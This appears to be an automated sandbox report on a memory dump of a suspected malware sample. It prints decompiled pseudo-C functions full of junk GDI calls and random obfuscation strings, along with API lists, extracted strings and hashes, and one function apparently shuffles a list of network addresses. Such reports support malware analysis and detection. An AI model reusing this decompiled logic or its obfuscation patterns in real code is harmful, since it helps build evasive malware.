				 *((intOrPtr*)(_t64 + 0x90))( *0xef56f4);
				E00ECD1EA( &_v108, 0);
				_t68 = _v124;
				goto L21;
			}

0x00ec67df
0x00ec67df
0x00ec67df
0x00ec67e5
0x00ec67ed
0x00ec67ed
0x00ec67f9
0x00ec67fe
0x00000000
0x00000000
0x00ec680b
0x00ec6810
0x00ec6816
0x00ec681b
0x00ec6821
0x00ec6823
0x00ec6827
0x00ec6874
0x00ec6831
0x00ec6831
0x00ec6836
0x00ec6837
0x00ec6845
0x00000000
0x00ec6847
0x00ec6857
0x00ec685d
0x00ec6867
0x00000000
0x00ec6867
0x00ec6845
0x00ec69e6
0x00ec69ec
0x00ec69ec
0x00ec6880
0x00ec6881
0x00ec6882
0x00ec6883
0x00ec6884
0x00ec6889
0x00ec6895
0x00ec689b
0x00ec689c
0x00ec68a2
0x00ec68bd
0x00ec68c0
0x00ec68ca
0x00ec68d5
0x00ec68f1
0x00ec68f5
0x00ec68fc
0x00ec6904
0x00ec6905
0x00ec690b
0x00ec690d
0x00ec690d
0x00ec6917
0x00ec691b
0x00ec6923
0x00ec6925
0x00ec692e
0x00ec6940
0x00ec6942
0x00ec694a
0x00ec6925
0x00ec6954
0x00ec6956
0x00ec6957
0x00ec695f
0x00ec6960
0x00ec6967
0x00ec696e
0x00ec6976
0x00ec6979
0x00ec697b
0x00ec697b
0x00ec697d
0x00ec6981
0x00ec6987
0x00ec6989
0x00ec6992
0x00ec69a4
0x00ec69a6
0x00ec69aa
0x00ec6989
0x00ec6987
0x00ec68a4
0x00ec68a4
0x00ec68a4
0x00ec69b6
0x00ec69bb
0x00ec69c4
0x00ec69c9
0x00ec69cf
0x00ec69db
0x00ec69e0
0x00000000

APIs

BitBlt.GDI32(00000000,00000052,00000018,0000001F,00000008,00000000,0000001D,0000004A,00000045), ref: 00EC6857
GetCurrentProcess.KERNEL32(00EF5714,00000000,00000000,00000002,?,?,?), ref: 00EC68BD
GetCurrentThread.KERNEL32 ref: 00EC68C0
GetCurrentProcess.KERNEL32(00000000,?,?,?), ref: 00EC68C7
DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 00EC68CA
GetLastError.KERNEL32(?,?,?), ref: 00EC68F5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020,?,?,?), ref: 00EC6940
GetLastError.KERNEL32(?,?), ref: 00EC6967
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00EC69A4

Part of subcall function 00ECE0AF: GetSystemTimeAsFileTime.KERNEL32(00EC8610,?,?,?,00EC8610,00000000), ref: 00ECE0B8
Part of subcall function 00ECE0AF: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ECE0D8

Strings

eTL659CbJAv0OX,OBTUPdltDM9PaXm2f9EXhHR43fdNz n8h9rrRNUwMaHYfhU 5YBKWi 7Y,eqYseNIwPZ5 w9S7ZPpBRVRJQx.Vw3,MIM3WKAOKL,9Rw WfEwTO6Rx5kM7gnJm 31im6H3rsUytDFAFn PZli4Lhuw5w3PQIZDiCOGLttNQBJmmBxvNjTnUUvU3 3Ym97iLnfacBa9IWc4K70WRSl5q2Nvau9xIPd6SA35PBdVkyl7h 2E5qep7TDk, xrefs: 00EC68F7
rb lVSi4kRLkpklNxBaipecXZA.S nO,yQBuQuNt1t6tQ3EaPYQQz,PQAYpIGDBF2 K1bnOGQY1bfbUhNf0DUk1L8jKKeiP 4bn1x XaqVCu6mNmnFHerqAUa MdRwcZZDAH4JV3DgKC2CnSE0CokyD u8, IDO.Z93.CpcYu 7pibf4EWfBA.H7vCjKmf8ESnaGWZbjV6BS0CxSEk8dT 5DtzweH.KMXsdxVoqBagEME b E9PSF8962GhUAS sKji, xrefs: 00EC6969

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Current$ByteCharErrorLastMultiProcessTimeWide$DuplicateFileHandleSystemThreadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: eTL659CbJAv0OX,OBTUPdltDM9PaXm2f9EXhHR43fdNz n8h9rrRNUwMaHYfhU 5YBKWi 7Y,eqYseNIwPZ5 w9S7ZPpBRVRJQx.Vw3,MIM3WKAOKL,9Rw WfEwTO6Rx5kM7gnJm 31im6H3rsUytDFAFn PZli4Lhuw5w3PQIZDiCOGLttNQBJmmBxvNjTnUUvU3 3Ym97iLnfacBa9IWc4K70WRSl5q2Nvau9xIPd6SA35PBdVkyl7h 2E5qep7TDk$rb lVSi4kRLkpklNxBaipecXZA.S nO,yQBuQuNt1t6tQ3EaPYQQz,PQAYpIGDBF2 K1bnOGQY1bfbUhNf0DUk1L8jKKeiP 4bn1x XaqVCu6mNmnFHerqAUa MdRwcZZDAH4JV3DgKC2CnSE0CokyD u8, IDO.Z93.CpcYu 7pibf4EWfBA.H7vCjKmf8ESnaGWZbjV6BS0CxSEk8dT 5DtzweH.KMXsdxVoqBagEME b E9PSF8962GhUAS sKji
API String ID: 3007511479-2684283124
Opcode ID: 1ca66f974e3c1348464b9114cfae80e96191447c1d8499bac4efd265bb5106df
Instruction ID: b3fde697c368bf23b8645522653c43bdfe79832ae1456367f8816e3fec07b7c9
Opcode Fuzzy Hash: 1ca66f974e3c1348464b9114cfae80e96191447c1d8499bac4efd265bb5106df
Instruction Fuzzy Hash: A651BE72108305AFD310EF25DD85E2B7BE8FB94364F10292EF254AA1E1DB31D949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EC5FF4, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 169
windowfilestringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00EC5FF4(struct HDC__* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				signed int _v20;
				char _v21;
				char _v36;
				short _v100;
				intOrPtr* _t42;
				signed int _t46;
				signed int _t48;
				signed int _t49;
				signed int _t58;
				intOrPtr _t59;
				signed int _t65;
				signed short _t69;
				intOrPtr* _t72;
				intOrPtr _t73;
				void* _t77;
				signed int _t88;
				signed int _t89;
				CHAR** _t90;
				signed short _t91;
				void* _t92;
				void* _t93;
				signed short _t98;
				void* _t100;

				_t100 = __fp0;
				_t86 = __edx;
				_t42 =  *0xef5710; // 0x51f1890
				_v8 = _v8 | 0xffffffff;
				if( *_t42 != 0) {
					L5:
					_t98 =  *0xef571c; // 0x0
					if(_t98 != 0) {
						CreateEnhMetaFileA(0, "XyKgoYNLvLaKSTlod 5Cb35dflM60QK1.ZAaVhnhrtjnAR0Q07FNCTKTWK6 RV1ZX2Rt9z ZhgABC0v4IbdOSA0u q 4Ycl96 Y.f1BncP VIZcjN7hdLrMHSLRREigFSps.qTYKnRkGaGt24thN7phOlfB7dRDo9UygQmeP,Q9bPAT3ejS0JeYwkBliyVGcE5J,pw6ji.BYeBpCMhq9q4G5CcuFOGzT5 cmjP0WPMKfxTsMPRfq96Vf,,6Ka2Kr.jorKyFvHyRy b2t7yqU VDfA8ctspBD.qg.MIsaXuAux6aDZ95lAZiRY7ulF0WAleKjoprp4iL0 1o2Ycb lIzcZt23QZAE0NjhiFFgDT3zPNgQSoVSR,x gqEq x8eqFG c1bMnx xo77v LyCB6QEeuIssDs HP rpQmvnIEUR k.kLNNNm17ZyDAGPR2N5 pCEQ3pA8x5COBU9ZlJW q 0lV9yEtYGrpVi3ZmyGvBpA7mZsp1p TPzML9waFPrVZ8Nf7aUofrz62TfhxZolo,i66pMARS gA pHEvlwtBTrdquusr8MP2196 PblcID2El5WyMXcoYULqutKqxxC1UUpGmXh, oCxTHZNJjzGAqDCmbEgPcAnLI,unxumOSe6ZI51mnYpkuTE2SbVWVhtnEq2fioQ0nkTUsfF3ttbiEis.iqh 3k6Oh0eI keUxa9iBv82Nh a0I8Hd JcjeGu5bTKsaHT.l0a333x tgFLUag05be02z T F,6510OB09j  TY99LaIcIoXKtz5nl.J8 pM K02VDI4OadmLHZSl0wDkZz9niwrRflLm5uMamuIYGwDvFhwxWfgy ,xgsGaA4f3h csw HUQD,A2wU O3iK,3NnBXPTS,L1zRwZjS ER VCTxbSnnjb8vvbDTzp 8tJNU nl62tOuJR1Rok 6gkLqRoR6vwgHWlnCPzBFstI,5B72aGpH,yJzlYqeqK,1mDWL26l8d9,fKxIipv6GHjPXYAj3n", 0, 0);
						_t65 = E00EC6295(_t77, _t86, _t98, _a8,  *0xef5710,  *0xef571c & 0x0000ffff, _a4);
						_t93 = _t93 + 0x10;
						_v8 = _t65;
						BitBlt(0, 0x1f, 0x40, 0x16, 0x57, 0, 0x43, 0x16, 0x2f);
						if(_v8 >= 0) {
							return _v8;
						}
					}
				} else {
					_v16 = E00ED172C(0x2d);
					_t69 = E00ED1A5D(__edx, 0x2e);
					_t86 = _v16;
					_t91 = _t69;
					if(_v16 != 0 && _t91 != 0xffffffff) {
						_t73 =  *0xef5710; // 0x51f1890
						E00ECE0FE(_t73, 0x100, _t86);
						BitBlt(0, 0x32, 0xd, 0x11, 0x63, 0, 0x2c, 0x2e, 0x4e);
						 *0xef571c = _t91;
					}
					E00ECD1EA( &_v16, 0xffffffff);
					_t72 =  *0xef5710; // 0x51f1890
					_pop(_t77);
					if( *_t72 != 0) {
						goto L5;
					}
				}
				_v16 = 0;
				_v20 = E00EC59FD(_t86, _t100,  &_v16);
				GetLastError();
				_t46 = E00ECFE78("BJ7kv.3z8q6qhXXGE.Wzc2B7e lUFxp.X. TTTGTB88ivu71QT fe7XQy,SLIX2YHk2DVpHFk19aMZtmGCWq7 G2yfmZ5 M58sHw UARXg3 bXq8vi9kJAaJM9lT.EiliqF XUK,MUk5iJ4NGHY8Ls4X ZBdcCIewA.4hm2YD.giscxMlrouQfaE32doNHc eU.8l7fcTE4oOQSzdS7izz.TW4NodpKbxY1yLnMT6zm RYeqSFz0f17Y,jQXMjM.Zle.fOobgI6RX1JNN1D5Vg0Cf I7.oR2 ge8pmtnRQERlS0WA svTaM,8oh51AHDpfug c3KAsWNi1 I4bdN");
				_pop(_t79);
				_t88 = 0xf;
				__eflags = _t46 - _t88;
				if(_t46 <= _t88) {
					_t88 = _t46;
				}
				_v21 = 0;
				_v12 = 0;
				__eflags = _t88;
				if(_t88 > 0) {
					do {
						_t59 = _v12;
						_t79 = _t59 + 0x42;
						 *((char*)(_t92 + _t59 - 0x20)) = _t59 + 0x42;
						MultiByteToWideChar(0, 0,  &_v36, 0xffffffff,  &_v100, 0x20);
						_v12 = _v12 + 1;
						__eflags = _v12 - _t88;
					} while (_v12 < _t88);
				}
				_t89 = _v20;
				__eflags = _t89;
				if(_t89 != 0) {
					_v12 = 0;
					__eflags = _v16;
					if(_v16 > 0) {
						_t90 = _t89 + 4;
						__eflags = _t90;
						while(1) {
							__eflags =  *_t90;
							if(__eflags != 0) {
								_t53 =  *_t90;
								__imp__#12(0x10);
								lstrcpynA( &_v36,  *_t90, _t53);
								_t29 =  &(_t90[1]); // 0x83ec8b55
								_t58 = E00EC6295(_t79, _t86, __eflags, _a8,  &_v36,  *_t29 & 0x0000ffff, _a4);
								_t93 = _t93 + 0x10;
								_v8 = _t58;
							}
							__eflags = _v8;
							if(_v8 >= 0) {
								goto L19;
							}
							_v12 = _v12 + 1;
							_t90 =  &(_t90[8]);
							__eflags = _v12 - _v16;
							if(_v12 < _v16) {
								continue;
							}
							goto L19;
						}
					}
					L19:
					E00ECD1EA( &_v20, _v16);
				}
				BitBlt(0, 0x30, 0xf, 0x39, 0x21, 0, 0xe, 0x1d, 0x2e);
				_t48 = _v8;
				__eflags = _t48;
				if(_t48 < 0) {
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				}
				return _t48;
			}

0x00ec5ff4
0x00ec5ff4
0x00ec5ffa
0x00ec5fff
0x00ec6010
0x00ec6071
0x00ec6071
0x00ec6078
0x00ec6082
0x00ec609c
0x00ec60a1
0x00ec60b4
0x00ec60b7
0x00ec60bc
0x00000000
0x00ec60be
0x00ec60bc
0x00ec6012
0x00ec601c
0x00ec601f
0x00ec6024
0x00ec6028
0x00ec602c
0x00ec6033
0x00ec603d
0x00ec6052
0x00ec6054
0x00ec6054
0x00ec6061
0x00ec6066
0x00ec606c
0x00ec606f
0x00000000
0x00000000
0x00ec606f
0x00ec60ca
0x00ec60d3
0x00ec60d6
0x00ec60e1
0x00ec60e6
0x00ec60e9
0x00ec60ea
0x00ec60ec
0x00ec60ee
0x00ec60ee
0x00ec60f0
0x00ec60f3
0x00ec60f6
0x00ec60f8
0x00ec60fa
0x00ec60fa
0x00ec60fd
0x00ec6102
0x00ec6112
0x00ec6118
0x00ec611b
0x00ec611b
0x00ec60fa
0x00ec6120
0x00ec6123
0x00ec6125
0x00ec6127
0x00ec612a
0x00ec612d
0x00ec612f
0x00ec612f
0x00ec6132
0x00ec6132
0x00ec6134
0x00ec6136
0x00ec613b
0x00ec6146
0x00ec614c
0x00ec615b
0x00ec6160
0x00ec6163
0x00ec6163
0x00ec6166
0x00ec6169
0x00000000
0x00000000
0x00ec616b
0x00ec6171
0x00ec6174
0x00ec6177
0x00000000
0x00000000
0x00000000
0x00ec6177
0x00ec6132
0x00ec6179
0x00ec6180
0x00ec6186
0x00ec6197
0x00ec6199
0x00ec619c
0x00ec619e
0x00ec61a0
0x00ec61a0
0x00000000
0x00ec61a0
0x00ec61a7

APIs

BitBlt.GDI32(00000000,00000032,0000000D,00000011,00000063,00000000,0000002C,0000002E,0000004E), ref: 00EC6052
CreateEnhMetaFileA.GDI32(00000000,XyKgoYNLvLaKSTlod 5Cb35dflM60QK1.ZAaVhnhrtjnAR0Q07FNCTKTWK6 RV1ZX2Rt9z ZhgABC0v4IbdOSA0u q 4Ycl96 Y.f1BncP VIZcjN7hdLrMHSLRREigFSps.qTYKnRkGaGt24thN7phOlfB7dRDo9UygQmeP,Q9bPAT3ejS0JeYwkBliyVGcE5J,pw6ji.BYeBpCMhq9q4G5CcuFOGzT5 cmjP0WPMKfxTsMPRfq96Vf,,6Ka2Kr.jor,00000000,00000000), ref: 00EC6082
BitBlt.GDI32(00000000,0000001F,00000040,00000016,00000057,00000000,00000043,00000016,0000002F), ref: 00EC60B7
GetLastError.KERNEL32(?,00EF5700,00000000), ref: 00EC60D6
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00EC6112
inet_ntoa.WS2_32(00000000), ref: 00EC613B
lstrcpynA.KERNEL32(?,00000000), ref: 00EC6146
BitBlt.GDI32(00000000,00000030,0000000F,00000039,00000021,00000000,0000000E,0000001D,0000002E), ref: 00EC6197

Part of subcall function 00ECE0FE: memset.MSVCRT ref: 00ECE121

Strings

@}s, xrefs: 00EC613B
XyKgoYNLvLaKSTlod 5Cb35dflM60QK1.ZAaVhnhrtjnAR0Q07FNCTKTWK6 RV1ZX2Rt9z ZhgABC0v4IbdOSA0u q 4Ycl96 Y.f1BncP VIZcjN7hdLrMHSLRREigFSps.qTYKnRkGaGt24thN7phOlfB7dRDo9UygQmeP,Q9bPAT3ejS0JeYwkBliyVGcE5J,pw6ji.BYeBpCMhq9q4G5CcuFOGzT5 cmjP0WPMKfxTsMPRfq96Vf,,6Ka2Kr.jor, xrefs: 00EC607C
BJ7kv.3z8q6qhXXGE.Wzc2B7e lUFxp.X. TTTGTB88ivu71QT fe7XQy,SLIX2YHk2DVpHFk19aMZtmGCWq7 G2yfmZ5 M58sHw UARXg3 bXq8vi9kJAaJM9lT.EiliqF XUK,MUk5iJ4NGHY8Ls4X ZBdcCIewA.4hm2YD.giscxMlrouQfaE32doNHc eU.8l7fcTE4oOQSzdS7izz.TW4NodpKbxY1yLnMT6zm RYeqSFz0f17Y,jQXMjM.Zle., xrefs: 00EC60DC

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ByteCharCreateErrorFileLastMetaMultiWideinet_ntoalstrcpynmemset
String ID: @}s$BJ7kv.3z8q6qhXXGE.Wzc2B7e lUFxp.X. TTTGTB88ivu71QT fe7XQy,SLIX2YHk2DVpHFk19aMZtmGCWq7 G2yfmZ5 M58sHw UARXg3 bXq8vi9kJAaJM9lT.EiliqF XUK,MUk5iJ4NGHY8Ls4X ZBdcCIewA.4hm2YD.giscxMlrouQfaE32doNHc eU.8l7fcTE4oOQSzdS7izz.TW4NodpKbxY1yLnMT6zm RYeqSFz0f17Y,jQXMjM.Zle.$XyKgoYNLvLaKSTlod 5Cb35dflM60QK1.ZAaVhnhrtjnAR0Q07FNCTKTWK6 RV1ZX2Rt9z ZhgABC0v4IbdOSA0u q 4Ycl96 Y.f1BncP VIZcjN7hdLrMHSLRREigFSps.qTYKnRkGaGt24thN7phOlfB7dRDo9UygQmeP,Q9bPAT3ejS0JeYwkBliyVGcE5J,pw6ji.BYeBpCMhq9q4G5CcuFOGzT5 cmjP0WPMKfxTsMPRfq96Vf,,6Ka2Kr.jor
API String ID: 158437196-549478194
Opcode ID: 21d20899b99dd0de45031e88b7125b995725abc89066bb50aab4b5048d5f19d0
Instruction ID: f2be9b942632651c3b05e8fc653882c12be568da582235ca94de72bf75bd9cee
Opcode Fuzzy Hash: 21d20899b99dd0de45031e88b7125b995725abc89066bb50aab4b5048d5f19d0
Instruction Fuzzy Hash: 7D51B372D4020CFFEB20ABA4DD86FAE77B8EB04710F14556AF610BB1D2D6B25A45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EC59FD, Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 267
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00EC59FD(void* __edx, void* __fp0, signed int _a4) {
				signed int _v12;
				signed int _v16;
				char _v17;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				struct HDC__* _v48;
				char _v49;
				char _v64;
				char _v80;
				short _v144;
				void* __ebx;
				void* __esi;
				intOrPtr _t90;
				signed int _t91;
				intOrPtr _t96;
				void* _t101;
				signed int _t112;
				intOrPtr _t121;
				signed int _t123;
				signed int _t131;
				signed int _t134;
				signed int _t148;
				void* _t156;
				signed int _t157;
				void* _t159;
				void* _t163;
				signed int _t170;
				signed int _t172;
				void* _t173;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t199;

				_t199 = __fp0;
				_t169 = __edx;
				_t90 =  *0xef5758; // 0x520f970
				_t170 = 0;
				_v17 = 0;
				_v12 = 0;
				_v32 = 0;
				_v48 = 0;
				_v24 = 0;
				_v28 = 0;
				_v36 = 0;
				_v44 = 0;
				_t91 = E00ED175B(_t90, __edx, 0x39,  &_v12,  &_v17);
				_t184 = _t183 + 0xc;
				_v16 = _t91;
				if(_t91 != 0 && _v17 == 5) {
					_v36 = E00EC5CD5(_t91, _v12,  &_v32);
				}
				E00ECD1EA( &_v16, _v12);
				_v16 = E00EC27A1();
				_t96 =  *0xef56a8; // 0xf00000
				_v12 = E00ED1A9C( &_v28, _t199,  *((intOrPtr*)(_t96 + 0x224)), _t95);
				_t185 = _t184 + 0x10;
				E00ED02B3( &_v16);
				GetLastError();
				_t101 = E00ECFE78("cSjoN5zj4IMaCjH.2wdV7iXxnkrZVISIEBR0 l8GYAFCd.Y55 kmQ2 HfJdV7uidl9VrLBv.DqoL8vBqRA 8XUEr3gCh.E0iHAieYlV   3VtqLNT7yj0H0BFoRo 9KPFC0CP YOFb6iPisElGK3xC7uWyGjxi x35 WcF7kA9Zv6tHw5K3eattOcLy7yp42o B8FSjSQnkl  Vqxzc8raaljmt eX5 e2,KlHfvmJbYtb6vgKMKHj6uoIdrkYZ lbx5 obYCFGdS6AmMj0u3uoRNLkgDm9Ca.BTpqrx4QX67G.AkFOOdb62glJKhcvttLOaYjq4rzEOqYLISa kmzWSD aAw.WQek96dJFMBCKZEcByytVMfQ UusxLhOiBEnr0Qqk.uXz");
				_pop(_t159);
				_t173 = 0xf;
				if(_t101 <= _t173) {
					_t173 = _t101;
				}
				_t156 = 0;
				_v49 = 0;
				if(_t173 == 0) {
					L7:
					if(_v12 != _t170) {
						_push(0x19);
						_v16 = E00EC27A1();
						_t180 = E00ECF965(_t159, _v12, _v28, _t138);
						_t185 = _t185 + 0xc;
						_v40 = _t180;
						E00ED02B3( &_v16);
						if(_t180 != 0) {
							_t148 = E00EC5CD5( *((intOrPtr*)(_t180 + 0x424)),  *((intOrPtr*)(_t180 + 0x428)),  &_v48);
							_t170 = _v48;
							_v44 = _t148;
						}
						E00ECD1EA( &_v12, _v28);
						_pop(_t163);
						CreateEnhMetaFileA(0, "52R6ZeKe9qHeop C5O,xW8z4z9nbTZVCt0LvTX,ywg  aIyN04P6GxDyg4f6aBtQy8t,PWloW RX92GPrGZUGbBRutWx4S1ditJ6msV.B QvfaCoVyVXZv7QkfkXK5heL xyP3CvelTXoSiLM7SO s1d5scdS6w7fHHIKakwwnzSvqYdYBiwzl7TPSzvGTqmdsfTd79 hsKhahcpB544 j16 SaNwKy.zlYwN0igSjkuEAJmthgZhPr97 v7jSO,8E.bjqAt3 7rGRT4evB1ZsC 2I4QOP3q,1IP9v 0dkWtvv2NxCNQAIC5YbfROnaiOnIaXaS1oa9zum0 kq xvma,DUgAzQxobBMw0EFRzRqkEep3Ssa6,NbbXQC. yjJMLGml9tVkrPqzQ3TLPpM0iUPnQm8UT.j V975xVdnD3xXZPwFTqUdySKjI.zDb 01hjtAu.qVwqUza FH.95Fmv0eWRrjUu18X9DzWv5kuj,.q5yw,MNZC.xlbCnUzNkLSbbxwGkgZPQtEzAzlB0mKWW0rWZtcaJfoDCjWI7nblz mS,D22M1opKaeWc8p7au,njonLCuN5IS5Fiy8PwwCCQVjhGt69.agISD8ejZoge18OE6GNJVmt  gj2avp N,LS6jd6l2W5,RE7 3AQHDQ BMkCFcjwt1fp75eqWHimGGgOYuFjmkX aXypZcrmmQhU0 MOUcIJ9pNLc2Jg8jYmtSTqenTduETumJanU1tsWpp6SSbDvNsoC 75ina3WZAX0y8HANOKN0A E62507UKX3YA8rcGcgGf 8S2GeedCwQIeg1Z0903D29xPtfJWp2k4F1Cf9CcZ,kfBGR1Xr,TJotHwQSJf kfb4sfyNI5F szJrTHh q1w7gSGVEm7wMeSBq8w6Ohve.0ItS154VKrN ViO5Gc4KksAMS x14zBNvz79pvMF3lX7YbYWUcr7tNugbL.BYh0LRDRTEvBMWMQlzHrs,8gIP mjBO1yJZNZCV.S zPF .y5Whhd  Mk251Vr2YEC w85oLdPYFx  dnlNbt sV.5bUNtiiWEr8.q6fr6LMm8AMWuo7Lf6ScpgcNuZNNUYVmR vWuhyirXTHs6RedO6YPDh G2HnSX CEwFF cfqrzHa5bYY3vPIwLoVxBQmVT8tAqyTCUMhwKEkhCviGGLCt7xSs6YpIipuIJbiYF. 7pU8VLX4GrpXwak5fPkqMnhPV  q87UuyBseQuwDI,ktNpvBE2GSYfJO2QQkPNX.j 0RyaLxaw 4vU68PukGeRbDlrAxGgac0.3,iRosL6M WnsoscGD47  ksMWj,2KTnYUSISx,10Txc zzpEuzLKgTwi.dZtFnI ,qspaNKO3 yP7vTn HSu72pUT.FnEB0Tl3qOLHd1xTkJ804XxODK6ti Uz 2Ujqj,WQ S3 sIYOHhCb8NKS9u4JgiRFJcWEN9z Uy4.o5NMDbqg.", 0, 0);
						E00ECF703(_t163, _t169,  &_v40);
					}
					_t174 = _v32;
					if(_t174 != 0 || _t170 != 0) {
						_t157 = E00ECD239(_t170 + _t174 << 5);
						ArcTo(0, 0x38, 0x57, 0x61, 0x40, 0x33, 0x2b, 7, 0x2c);
						__eflags = _t157;
						if(_t157 == 0) {
							L31:
							E00ECD1EA( &_v36, _v32 << 5);
							E00ECD1EA( &_v44, _t170 << 5);
							_t112 = _a4;
							__eflags = _t112;
							if(_t112 != 0) {
								 *_t112 = _v24;
							}
							Arc(0, 0x5b, 0x1d, 0x21, 0x44, 0x1e, 0x33, 0x5e, 0x44);
							return _t157;
						}
						__eflags = _v36;
						if(_v36 == 0) {
							__eflags = _t170 << 5;
							E00ECD177(_t157, _v44, _t170 << 5);
							_t185 = _t185 + 0xc;
							_v24 = _t170;
							L27:
							__eflags = _v24;
							if(__eflags <= 0) {
								goto L31;
							}
							_t172 = _t157;
							_v16 = _v24;
							do {
								_t121 =  *0xef56a8; // 0xf00000
								_t123 = E00EDCF06(__eflags, _t199, _t121 + 0x648, 0, _v24 - 1);
								E00ECD177( &_v80, _t172, 0x20);
								E00ECD177(_t172, (_t123 << 5) + _t157, 0x20);
								E00ECD177((_t123 << 5) + _t157,  &_v80, 0x20);
								_t185 = _t185 + 0x30;
								_t172 = _t172 + 0x20;
								_t80 =  &_v16;
								 *_t80 = _v16 - 1;
								__eflags =  *_t80;
							} while (__eflags != 0);
							_t170 = _v48;
							goto L31;
						}
						_t178 = _t174 << 5;
						E00ECD177(_t157, _v36, _t178);
						_v24 = _v32;
						_t131 = _v44;
						_t185 = _t185 + 0xc;
						__eflags = _t131;
						if(_t131 == 0) {
							goto L27;
						}
						__eflags = _t170;
						if(_t170 == 0) {
							goto L27;
						}
						_t179 = _t178 + _t157;
						__eflags = _t179;
						_v12 = _t131;
						_v16 = _t170;
						do {
							_v40 = _v40 & 0x00000000;
							__eflags = _v32;
							if(_v32 <= 0) {
								L23:
								E00ECD177(_t179, _v12, 0x20);
								_t185 = _t185 + 0xc;
								_v24 = _v24 + 1;
								_t179 = _t179 + 0x20;
								__eflags = _t179;
								goto L24;
							}
							_v28 = _v36;
							while(1) {
								_t134 = E00ECD0BB(_v12, _v28, 0x20);
								_t185 = _t185 + 0xc;
								__eflags = _t134;
								if(_t134 == 0) {
									goto L24;
								}
								_v40 = _v40 + 1;
								_v28 = _v28 + 0x20;
								__eflags = _v40 - _v32;
								if(_v40 < _v32) {
									continue;
								}
								goto L23;
							}
							L24:
							_v12 = _v12 + 0x20;
							_t70 =  &_v16;
							 *_t70 = _v16 - 1;
							__eflags =  *_t70;
						} while ( *_t70 != 0);
						goto L27;
					} else {
						return 0;
					}
				} else {
					do {
						_t24 = _t156 + 0x42; // 0x42
						 *((char*)(_t182 + _t156 - 0x3c)) = _t24;
						MultiByteToWideChar(0, 0,  &_v64, 0xffffffff,  &_v144, 0x20);
						_t156 = _t156 + 1;
					} while (_t156 < _t173);
					goto L7;
				}
			}

0x00ec59fd
0x00ec59fd
0x00ec5a13
0x00ec5a18
0x00ec5a1c
0x00ec5a1f
0x00ec5a22
0x00ec5a25
0x00ec5a28
0x00ec5a2b
0x00ec5a2e
0x00ec5a31
0x00ec5a34
0x00ec5a39
0x00ec5a3c
0x00ec5a41
0x00ec5a56
0x00ec5a56
0x00ec5a60
0x00ec5a70
0x00ec5a73
0x00ec5a86
0x00ec5a89
0x00ec5a8f
0x00ec5a94
0x00ec5a9f
0x00ec5aa4
0x00ec5aa7
0x00ec5aaa
0x00ec5aac
0x00ec5aac
0x00ec5aae
0x00ec5ab0
0x00ec5ab6
0x00ec5add
0x00ec5ae0
0x00ec5ae2
0x00ec5aee
0x00ec5af9
0x00ec5afb
0x00ec5b01
0x00ec5b04
0x00ec5b0d
0x00ec5b1f
0x00ec5b24
0x00ec5b28
0x00ec5b28
0x00ec5b32
0x00ec5b38
0x00ec5b41
0x00ec5b4a
0x00ec5b4a
0x00ec5b4f
0x00ec5b54
0x00ec5b80
0x00ec5b82
0x00ec5b88
0x00ec5b8a
0x00ec5c8a
0x00ec5c95
0x00ec5ca2
0x00ec5ca7
0x00ec5cad
0x00ec5caf
0x00ec5cb4
0x00ec5cb4
0x00ec5cc8
0x00000000
0x00ec5cce
0x00ec5b90
0x00ec5b94
0x00ec5c13
0x00ec5c1b
0x00ec5c20
0x00ec5c23
0x00ec5c26
0x00ec5c26
0x00ec5c2a
0x00000000
0x00000000
0x00ec5c2f
0x00ec5c31
0x00ec5c34
0x00ec5c39
0x00ec5c46
0x00ec5c57
0x00ec5c68
0x00ec5c77
0x00ec5c7c
0x00ec5c7f
0x00ec5c82
0x00ec5c82
0x00ec5c82
0x00ec5c82
0x00ec5c87
0x00000000
0x00ec5c87
0x00ec5b96
0x00ec5b9e
0x00ec5ba6
0x00ec5ba9
0x00ec5bac
0x00ec5baf
0x00ec5bb1
0x00000000
0x00000000
0x00ec5bb3
0x00ec5bb5
0x00000000
0x00000000
0x00ec5bb7
0x00ec5bb7
0x00ec5bb9
0x00ec5bbc
0x00ec5bbf
0x00ec5bbf
0x00ec5bc3
0x00ec5bc7
0x00ec5bf2
0x00ec5bf8
0x00ec5bfd
0x00ec5c00
0x00ec5c03
0x00ec5c03
0x00000000
0x00ec5c03
0x00ec5bcc
0x00ec5bcf
0x00ec5bd7
0x00ec5bdc
0x00ec5bdf
0x00ec5be1
0x00000000
0x00000000
0x00ec5be3
0x00ec5be9
0x00ec5bed
0x00ec5bf0
0x00000000
0x00000000
0x00000000
0x00ec5bf0
0x00ec5c06
0x00ec5c06
0x00ec5c0a
0x00ec5c0a
0x00ec5c0a
0x00ec5c0a
0x00000000
0x00ec5b5a
0x00000000
0x00ec5b5a
0x00ec5ab8
0x00ec5ab8
0x00ec5aba
0x00ec5abd
0x00ec5ad2
0x00ec5ad8
0x00ec5ad9
0x00000000
0x00ec5ab8

APIs

GetLastError.KERNEL32(?,?,?,?,76996980,00EF5700,00000000), ref: 00EC5A94
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020,?,?,?,?,76996980,00EF5700,00000000), ref: 00EC5AD2
